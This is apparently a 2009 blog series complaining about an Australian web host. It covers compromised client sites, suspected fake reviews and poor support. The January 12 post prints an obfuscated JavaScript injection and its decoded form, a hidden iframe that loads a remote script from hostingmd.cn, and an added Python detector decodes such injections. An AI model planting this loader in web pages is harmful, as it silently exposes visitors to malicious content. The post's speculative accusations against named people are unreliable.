More Hacked sites on the same server

Uncategorized January 17th, 2009

Seems someone at MD Web Hosting is reading here and removed the offending code on instrumentsolutions.com.au, or possibly Brad did it; either way it's been removed. So I did a little research on the actual server and found the following compromised websites. I wonder what the rate of compromised websites is on other hosting companies? Out of the 40-odd websites I checked (I did not check all websites) on the MD Web Hosting server, the following websites were found. 14 out of 40 or so must make you wonder. I am sure once they read this they will remove the offending code. There were three main infections that I found. Luckily archive.org and Google have long memories, so if they shout I am lying I have the proof to back it up.

  • How do they allow so many sites to exist on their servers compromised?
  • How did these sites get compromised in the first place?
  • If you are considering MD Web Hosting as a HOST maybe ask for the IP first and do a check to see how many infected websites are on the same server.

I would suggest that unless you know what you're doing you don’t visit these websites, as your system could be infected with various malicious scripts and programs.

http://vitalhealthgenics.com/ hacked not 1 but 2

http://www.annalisapansini.com/ several injections

More to the Story

Uncategorized January 12th, 2009

Hmmm, after a little bit more checking it looks like Brad and his website were the host of some rather curious pages. I wonder if he even knew about them?

http://web.archive.org/web/*/instrumentsolutions.com.au/*

Check out the spammy pages. When I did a bit of a Google search for those pages they were spammed out like crazy. Whoever got access to their site had posted spam on their site and then proceeded to gain 100s of spammy links to those pages.

Google Results

Another Good Story

Uncategorized January 12th, 2009

Going through the logs I see some unusual stuff, so while I am checking that out I find that http://www.webhostingstuff.com/review/MDWebHosting.html has had a few updates to its reviews. Now all these reviews are in a close-knit span of time: 1 on the 3rd December 2008, 2 on the 4th December 2008, 1 on the 9th December 2008, and finally 1 on the 12th December (now this looks suss to me, but who am I to argue). All these kind souls may have felt the need to put in positive reviews all at the same time. I don’t own the site and don’t have access to the IP logs, so I am sure the owners of webhostingstuff looked into it and saw they were legit?

Anyways, back to my story. The post on the 12th of December was from Brad (instrumentsolutions.com.au). Now as far as I can tell (and I could be wrong) Brad is a Director, designer and technical support for the domain and business. He gives MD Web Hosting a glowing report: 5 stars for Overall Rating, Uptime & Reliability, Technical Support and Customer Service. He must be very happy with MD Web Hosting.

Now you must be saying “SO WHAT”. Well, the interesting thing is I wonder who injected malicious code into their domain. Was it:

  • someone hacked their site? Are they using a sloppy script?
  • Brad put it in there for some reason? Why would you?
  • or did someone hack the MD Web Hosting server and inject the code?

Now I am not sure who put it in there; luckily the infection has been neutralised. I am sure from past interactions with MD that they will blame Brad for this problem.

The offending code has been obfuscated:

<script type="text/javascript"><!--
document.write(unescape('%3c%69%
66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%68%6f
%73%74%69%6e%67%6d%64%2e%63%6e%2f%73%2f%6f%75%74%2e%70%68%70
%3f%73%5f%69%64%3d%31%22%20%77%69%64%74%68%3d%31%20%68%65%69
%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c
%69%74%79%3a%20%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d
%65%3e'))
// -->


Which in turn produces this iframe:

<script type="text/javascript"><!--
document.write(unescape('<iframe src="http://hostingmd.cn/s/out.php?s_id=1" width=1 height=1 style="visibility: hidden"></iframe>'))
// -->
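A way to check saved pages for this pattern, as an added example that is not part of the original post: it finds `document.write(unescape('%..'))` calls, decodes the argument and reports any iframe the decoded markup contains, flagging the hiding tricks seen above. The function names and the `injected.example` placeholder domain are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# document.write(unescape('...')) whose argument is entirely %XX escapes.
# Whitespace is tolerated because pasted samples are often line-wrapped.
WRITE_UNESCAPE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])"
    r"(?P<blob>(?:%[0-9a-fA-F]{2}|\s)+)\1\s*\)\s*\)")

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))

def is_hidden(attrs):
    """Hiding tricks used by the sample: 0/1-pixel size or CSS hiding."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "visibility:hidden" in style or "display:none" in style

def find_injected_iframes(html):
    """Return [(src, hidden)] for iframes emitted via document.write(unescape())."""
    findings = []
    for match in WRITE_UNESCAPE.finditer(html):
        # Literal whitespace is never payload: real spaces are encoded as %20.
        decoded = unquote(re.sub(r"\s+", "", match.group("blob")))
        collector = IframeCollector()
        collector.feed(decoded)
        collector.close()
        findings += [(a.get("src"), is_hidden(a)) for a in collector.iframes]
    return findings

# Constructed sample: same shape as the injection above, placeholder domain.
_PAYLOAD = ('<iframe src="http://injected.example/s/out.php?s_id=1" width=1 '
            'height=1 style="visibility: hidden"></iframe>')
SAMPLE_PAGE = ('<html><body><script type="text/javascript"><!--\n'
               "document.write(unescape('"
               + "".join("%%%02x" % b for b in _PAYLOAD.encode())
               + "'))\n// -->\n</script></body></html>")

if __name__ == "__main__":
    for src, hidden in find_injected_iframes(SAMPLE_PAGE):
        print("injected iframe:", src, "(hidden)" if hidden else "(visible)")
```

The pattern only matches arguments that are fully percent-encoded, so a partly encoded or differently wrapped injection needs its own rule.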


I wonder, should I send an email? Is it worth it?

Customer Non Service

Uncategorized January 9th, 2009

I was reading Whirlpool again (a great source of embarrassment for MD Web Hosting) and one of their clients, who said he was from Hong Kong, said he couldn’t contact them, as they had lost their phone numbers. (Knowing how well they treat their online help) he put a message up on Whirlpool asking for help in contacting them. Much to my surprise, MD Web Hosting’s representative tomn on Whirlpool asked him to whim him in a fairly quick time. Another user decided to give him some phone numbers (which had been disconnected); tomn’s reply was that those numbers no longer belonged to MD Web Hosting and that the only number to use was their 1300 number. Now, not sure if tomn knows this, but 1300 numbers are only accessible inside Australia, and seeing the guy was from Hong Kong then that's a problem. With all luck he is their only customer from outside Australia and will be the only person affected by this, but my guess, from the searches people are landing on this site with about contact numbers for MD Web Hosting, is that he is not the only person that can’t get in touch. Here is the thread in mention.